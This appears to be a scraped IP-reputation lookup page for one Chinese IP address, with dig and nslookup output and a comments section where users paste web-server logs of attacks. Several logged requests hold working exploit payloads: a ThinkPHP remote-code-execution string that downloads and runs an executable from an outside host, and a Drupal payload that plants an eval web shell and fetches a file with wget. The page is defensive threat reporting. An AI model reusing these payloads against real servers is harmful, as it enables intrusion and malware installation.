Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: China

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 42.130.133.210
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 9291
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;42.130.133.210.			IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025022802 1800 900 604800 86400

;; Query time: 58 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Mar 01 09:53:12 CST 2025
;; MSG SIZE  rcvd: 107
Host info
Host 210.133.130.42.in-addr.arpa. not found: 3(NXDOMAIN)
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 210.133.130.42.in-addr.arpa: NXDOMAIN
Related IP info:
Related comments:
IP Type Details Datetime
172.245.184.232 attack
172.245.184.232 - - [16/Apr/2019:16:17:39 +0800] "GET /Public/Wchat/js/cvphp.js HTTP/1.1" 404 481 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488)"
2019-04-16 16:19:38
5.188.210.101 botsattack
5.188.210.101 - - [16/Apr/2019:16:54:38 +0800] "GET http://5.188.210.101/echo.php HTTP/1.1" 404 465 "https://www.google.com/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
2019-04-16 16:55:07
221.230.132.58 attack
221.230.132.58 - - [11/Apr/2019:00:24:49 +0800] "GET /public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/ubhflqgunjzgqat2803.exe');start%20C:/Windows/temp/ubhflqgunjzgqat2803.exe HTTP/1.1" 301 194 "http://118.25.52.138:80/public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/ubhflqgunjzgqat2803.exe');start C:/Windows/temp/ubhflqgunjzgqat2803.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
221.230.132.58 - - [11/Apr/2019:00:24:49 +0800] "GET /public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/ubhflqgunjzgqat2803.exe');start%20C:/Windows/temp/ubhflqgunjzgqat2803.exe HTTP/1.1" 404 232 "http://118.25.52.138:80/public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/ubhflqgunjzgqat2803.exe');start C:/Windows/temp/ubhflqgunjzgqat2803.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
2019-04-11 05:58:21
58.251.121.185 attack
58.251.121.185 - - [10/Apr/2019:15:04:42 +0800] "GET //data/cache/asd.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
58.251.121.185 - - [10/Apr/2019:15:04:42 +0800] "GET //data/cache/asd.php HTTP/1.1" 404 209 "http://ipinfo.asytech.cn//data/cache/asd.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
2019-04-10 15:10:14
192.243.53.51 bots
192.243.53.51 - - [17/Apr/2019:17:34:27 +0800] "GET / HTTP/1.1" 200 29611 "-" "SEMrushBot"
2019-04-17 17:35:08
113.237.176.72 attack
113.237.176.72 - - [12/Apr/2019:13:28:32 +0800] "GET /mgw.htm?operationType=com.cars.otsmobile.queryLeftTicket&requestData=%5B%7B\\x22train_date\\x22%3A\\x2220181231\\x22%2C\\x22purpose_codes\\x22%3A\\x2200\\x22%2C\\x22from_station\\x22%3A\\x22BJP\\x22%2C\\x22to_station\\x22%3A\\x22SHH\\x22%2C\\x22station_train_code\\x22%3A\\x22\\x22%2C\\x22start_time_begin\\x22%3A\\x220000\\x22%2C\\x22start_time_end\\x22%3A\\x222400\\x22%2C\\x22train_headers\\x22%3A\\x22QB%23\\x22%2C\\x22train_flag\\x22%3A\\x22\\x22%2C\\x22seat_type\\x22%3A\\x220\\x22%2C\\x22seatBack_Type\\x22%3A\\x22\\x22%2C\\x22ticket_num\\x22%3A\\x22\\x22%2C\\x22dfpStr\\x22%3A\\x22\\x22%2C\\x22baseDTO\\x22%3A%7B\\x22check_code\\x22%3A\\x22d38a201f2de926ce0686aedfdcf2de68\\x22%2C\\x22device_no\\x22%3A\\x22WtaHBzID7ZQDADJh05y5LLpd\\x22%2C\\x22mobile_no\\x22%3A\\x22\\x22%2C\\x22os_type\\x22%3A\\x22a\\x22%2C\\x22time_str\\x22%3A\\x2220181030152947\\x22%2C\\x22version_no\\x22%3A\\x224.1.9\\x22%7D%7D%5D&ts=1540884587652&sign=37b8ebe6406579e4fb2ac8c9038eab37 HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
2019-04-12 13:29:24
113.89.1.30 bots
113.89.1.30 - - [19/Apr/2019:10:11:32 +0800] "GET / HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
113.89.1.30 - - [19/Apr/2019:10:11:33 +0800] "HEAD /check-ip/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
113.89.1.30 - - [19/Apr/2019:10:11:33 +0800] "GET /check-ip/ HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
113.89.1.30 - - [19/Apr/2019:10:11:34 +0800] "HEAD /report-ip HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
113.89.1.30 - - [19/Apr/2019:10:11:34 +0800] "GET /report-ip HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
113.89.1.30 - - [19/Apr/2019:10:11:35 +0800] "HEAD /faq HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
113.89.1.30 - - [19/Apr/2019:10:11:35 +0800] "GET /faq HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
2019-04-19 10:13:50
207.180.211.248 attack
207.180.211.248 - - [10/Apr/2019:15:58:13 +0800] "GET /t6nv.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
207.180.211.248 - - [10/Apr/2019:15:58:14 +0800] "GET /muhstik.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
207.180.211.248 - - [10/Apr/2019:15:58:14 +0800] "GET /text.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
207.180.211.248 - - [10/Apr/2019:15:58:14 +0800] "GET /wp-config.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
207.180.211.248 - - [10/Apr/2019:15:58:14 +0800] "GET /muhstik.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
207.180.211.248 - - [10/Apr/2019:15:58:15 +0800] "GET /muhstik2.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
207.180.211.248 - - [10/Apr/2019:15:58:15 +0800] "GET /muhstiks.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
207.180.211.248 - - [10/Apr/2019:15:58:15 +0800] "GET /muhstik-dpr.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
207.180.211.248 - - [10/Apr/2019:15:58:15 +0800] "GET /lol.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
2019-04-10 16:01:17
192.99.15.141 attack
192.99.15.141 - - [10/Apr/2019:21:48:58 +0800] "GET /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27 HTTP/1.1" 200 29740 "http://www.google.com.hk" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"
2019-04-11 06:38:05
119.146.144.118 attack
119.146.144.118 - - [10/Apr/2019:11:36:18 +0800] "POST /kvcollect?BossId=2865&Pwd=1698957057&uin=&vid=b07924sdtpe&coverid=&pid=&guid=&cmid=&unid=&vt=&type=&url=https%3A%2F%2Fv.qq.com%2Ftxp%2Fiframe%2Fplayer.html%3Fvid%3Db07924sdtpe&bi=&bt=&version=3.4.40&platform=11001&format=&defn=&ctime=2019-04-10%2011%3A36%3A18&ptag=&isvip=-1&tpid=&pversion=h5&hc_uin=&hc_main_login=&hc_vuserid=&hc_openid=&hc_appid=&hc_pvid=&hc_ssid=&hc_qq=&hh_ua=&ua=&ckey=&iformat=&hh_ref=https%3A%2F%2Fv.qq.com%2Ftxp%2Fiframe%2Fplayer.html%3Fvid%3Dcurrent_date&vuid=&vsession=&format_ua=other&common_rcd_info=&common_ext_info=&v_idx=0&rcd_info=&extrainfo=&vurl=&step=3&val=1&idx=0&c_info=&diagonal=511&isfocustab=0&isvisible=0&cpay=0&tpay=0&dltype=1 HTTP/1.1" 301 194 "http://imgcache.qq.com/tencentvideo_v1/player/TPout.swf" "-"
2019-04-10 11:36:43
123.249.7.34 attack
123.249.7.34 - - [12/Apr/2019:02:27:37 +0800] "POST /uploads/dede/sys_verifies.php?action=down HTTP/1.1" 301 194 "http://ipinfo.asytech.cn/uploads/dede/sys_verifies.php?action=down" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
123.249.7.34 - - [12/Apr/2019:02:27:37 +0800] "POST /index.php/api/Uploadify/preview HTTP/1.1" 301 194 "http://ipinfo.asytech.cn/index.php/api/Uploadify/preview" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
2019-04-12 06:28:14
122.152.211.94 botsattack
122.152.211.94 - - [18/Apr/2019:12:23:08 +0800] "GET /login HTTP/1.1" 301 194 "-" "-"
122.152.211.94 - - [18/Apr/2019:12:23:08 +0800] "GET /customers/1 HTTP/1.1" 301 194 "-" "-"
122.152.211.94 - - [18/Apr/2019:12:23:08 +0800] "GET /gs-guide-websocket/803/a8vbaovq/htmlfile?c=_jp.local HTTP/1.1" 301 194 "-" "-"
122.152.211.94 - - [18/Apr/2019:12:23:08 +0800] "GET /console/login/LoginForm.jsp HTTP/1.1" 301 194 "-" "-"
122.152.211.94 - - [18/Apr/2019:12:23:08 +0800] "POST /index.php?s=captcha HTTP/1.1" 301 194 "-" "-"
122.152.211.94 - - [18/Apr/2019:12:23:08 +0800] "GET /index.php?s=/Index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=abc HTTP/1.1" 301 194 "-" "-"
122.152.211.94 - - [18/Apr/2019:12:23:08 +0800] "POST /website/blog/ HTTP/1.1" 301 194 "-" "-"
2019-04-18 12:23:38
171.12.10.98 bots
171.12.10.98 - - [19/Apr/2019:12:57:39 +0800] "GET /view/img/favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"
171.12.10.98 - - [19/Apr/2019:12:57:39 +0800] "GET /home/favicon.ico HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"
171.12.10.98 - - [19/Apr/2019:12:57:40 +0800] "GET /home/favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"
171.12.10.98 - - [19/Apr/2019:12:57:40 +0800] "GET /2/favicon.ico HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
171.12.10.98 - - [19/Apr/2019:12:57:40 +0800] "GET /2/favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
171.12.10.98 - - [19/Apr/2019:12:57:46 +0800] "GET /3/favicon.ico HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
2019-04-19 13:02:20
163.177.90.152 attack
101.226.79.190 - - [10/Apr/2019:21:18:52 +0800] "GET /lindex.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
101.226.79.190 - - [10/Apr/2019:21:18:52 +0800] "GET /lindex.php HTTP/1.1" 404 209 "http://118.25.52.138/lindex.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
163.177.90.152 - - [10/Apr/2019:21:18:52 +0800] "GET /admin/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
163.177.90.152 - - [10/Apr/2019:21:18:53 +0800] "GET /admin/index.php HTTP/1.1" 404 209 "http://118.25.52.138/admin/index.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
2019-04-11 05:59:25
61.110.125.144 attack
wordpress攻击 本身不是wordpress程序还搞了个wp-login
61.110.125.144 - - [18/Apr/2019:10:10:52 +0800] "GET /check-ip/5.9.61.232 HTTP/1.1" 200 8330 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
61.110.125.144 - - [18/Apr/2019:10:10:52 +0800] "GET /wp-login.php?action=register HTTP/1.1" 404 209 "https://ipinfo.asytech.cn/" "Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17"
61.110.125.144 - - [18/Apr/2019:10:10:53 +0800] "GET /wp-login.php?action=register HTTP/1.1" 404 209 "https://ipinfo.asytech.cn/wp-login.php?action=register" "Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17"
2019-04-18 10:11:48

Recently Reported IPs

160.54.145.41 175.73.192.181 128.191.217.185 218.6.205.104
49.244.116.95 114.75.53.221 177.134.102.151 14.49.76.77
229.200.180.144 7.220.166.0 4.125.41.193 41.179.222.67
186.238.30.112 57.180.122.226 191.27.208.186 61.96.172.174
192.184.89.138 141.210.132.144 132.216.142.92 157.8.5.232